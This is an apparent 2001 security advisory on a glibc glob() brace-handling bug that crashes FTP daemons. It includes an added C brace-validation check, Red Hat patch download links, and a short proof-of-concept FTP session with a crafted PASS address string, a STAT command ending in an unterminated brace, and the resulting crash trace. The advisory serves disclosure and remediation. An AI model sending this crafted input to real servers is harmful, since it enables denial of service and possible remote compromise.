
[Global InterSec 2001121001] Problem in the glibc glob function


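Published: 2001-12-18
Updated: 2001-12-18
Severity:
Threat level: Remote administrator privileges
Error type: Exceptional condition handling error
Exploitation method: Server mode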

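Affected systems
glibc glob
Detailed description
glibc contains a globbing bug that can lead to remote attacks when software uses glob expansion, as FTP servers do.

The glibc glob() function lets a program search for files that match a given pattern according to a set of rules; glibc also implements the globfree() function. However, glob mishandles strings that contain the "{" (0x7b) character, which causes next_brace_sub() to read memory it is not able to read and ultimately makes the program receive SEGV.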
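
A server that hands client-supplied strings to glob() can refuse a pattern with an unterminated "{" before it reaches the library. The C below is an added example, not code from the advisory or from glibc; braces_closed(), checked_glob(), PATTERN_MAX and PATTERN_REJECTED are hypothetical names, and the pre-check is an extra layer on top of installing the fixed glibc packages.

```c
/* Added example: pre-check for glob() patterns taken from untrusted input. */
#define _DEFAULT_SOURCE       /* exposes the GNU GLOB_BRACE flag */
#include <glob.h>
#include <stddef.h>
#include <string.h>

#define PATTERN_MAX 1024      /* assumed length cap, not from the advisory */
#define PATTERN_REJECTED (-1) /* hypothetical code; glob() itself returns >= 0 */

/* Return 1 if every unescaped '{' has a matching '}', 0 otherwise.
 * Backslash escapes follow glob()'s default (GLOB_NOESCAPE not set).
 * A stray '}' is treated as a literal character. */
int braces_closed(const char *pattern)
{
    size_t depth = 0;

    for (const char *p = pattern; *p != '\0'; p++) {
        if (*p == '\\') {
            if (p[1] == '\0')
                break;          /* trailing backslash: stop at the terminator */
            p++;                /* skip the escaped character */
        } else if (*p == '{') {
            depth++;
        } else if (*p == '}' && depth > 0) {
            depth--;
        }
    }
    return depth == 0;
}

/* Hypothetical wrapper: validate first, expand only well-formed patterns. */
int checked_glob(const char *pattern, glob_t *out)
{
    if (pattern == NULL || strlen(pattern) >= PATTERN_MAX)
        return PATTERN_REJECTED;
    if (!braces_closed(pattern))
        return PATTERN_REJECTED;
    return glob(pattern, GLOB_BRACE, NULL, out);
}
```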

Test code
: 220 localhost FTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
   -> USER ftp
   : 331 Guest login ok, type your name as password.
   Sleeping for 10 seconds...
   -> PASS AAAAAAAAAAAAAAAAAAA\xef\xef\xbe\xad\xde # ( <19 Bytes> <Addr to write> <Glob char>)
   : 230 Guest login ok, access restrictions apply.
   -> STAT ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{


   #0 0x400f7968 in globfree () at ../sysdeps/generic/glob.c:1055
   #1 0x8051b0b in yyparse () at ftpcmd.y:1138
   #2 0x804b455 in main (argc=1094795585, argv=0xbffff864, envp=0xbffff86c) at ftpd.c:715

Examining the registers shows that an invalid address caused the FTP daemon to hit the SEG fault:




   <snip>
   esi 0xdeadbeef -559038737
   edi 0xdeadbeef -559038737
   </snip>

Solution
Install the following updated packages:

Red Hat Linux 6.2:


SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/glibc-2.1.3-23.src.rpm


alpha:
ftp://updates.redhat.com/6.2/en/os/alpha/glibc-2.1.3-23.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/glibc-devel-2.1.3-23.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/glibc-profile-2.1.3-23.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/nscd-2.1.3-23.alpha.rpm


i386:
ftp://updates.redhat.com/6.2/en/os/i386/glibc-2.1.3-23.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/glibc-devel-2.1.3-23.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/glibc-profile-2.1.3-23.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/nscd-2.1.3-23.i386.rpm


sparc:
ftp://updates.redhat.com/6.2/en/os/sparc/glibc-2.1.3-23.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/glibc-devel-2.1.3-23.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/glibc-profile-2.1.3-23.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/nscd-2.1.3-23.sparc.rpm


sparcv9:
ftp://updates.redhat.com/6.2/en/os/sparcv9/glibc-2.1.3-23.sparcv9.rpm


Red Hat Linux 7.0:


SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/glibc-2.2.4-18.7.0.3.src.rpm


alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-2.2.4-18.7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-devel-2.2.4-18.7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-profile-2.2.4-18.7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-common-2.2.4-18.7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/nscd-2.2.4-18.7.0.3.alpha.rpm


alphaev6:
ftp://updates.redhat.com/7.0/en/os/alphaev6/glibc-2.2.4-18.7.0.3.alphaev6.rpm


i386:
ftp://updates.redhat.com/7.0/en/os/i386/glibc-2.2.4-18.7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/glibc-devel-2.2.4-18.7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/glibc-profile-2.2.4-18.7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/glibc-common-2.2.4-18.7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/nscd-2.2.4-18.7.0.3.i386.rpm


i686:
ftp://updates.redhat.com/7.0/en/os/i686/glibc-2.2.4-18.7.0.3.i686.rpm


Red Hat Linux 7.1:


SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/glibc-2.2.4-19.3.src.rpm


alpha:
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-devel-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-profile-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-common-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/nscd-2.2.4-19.3.alpha.rpm


alphaev6:
ftp://updates.redhat.com/7.1/en/os/alphaev6/glibc-2.2.4-19.3.alphaev6.rpm


i386:
ftp://updates.redhat.com/7.1/en/os/i386/glibc-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/glibc-devel-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/glibc-profile-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/glibc-common-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/nscd-2.2.4-19.3.i386.rpm


i686:
ftp://updates.redhat.com/7.1/en/os/i686/glibc-2.2.4-19.3.i686.rpm


ia64:
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-devel-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-profile-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-common-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/nscd-2.2.4-19.3.ia64.rpm


Red Hat Linux 7.2:


SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/glibc-2.2.4-19.3.src.rpm


i386:
ftp://updates.redhat.com/7.2/en/os/i386/glibc-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/glibc-devel-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/glibc-profile-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/glibc-common-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nscd-2.2.4-19.3.i386.rpm


i686:
ftp://updates.redhat.com/7.2/en/os/i686/glibc-2.2.4-19.3.i686.rpm

Related information
tom.parker@globalintersec.com
Reference: http://www.globalintersec.com/adv/glibc-glob-2001121001.txt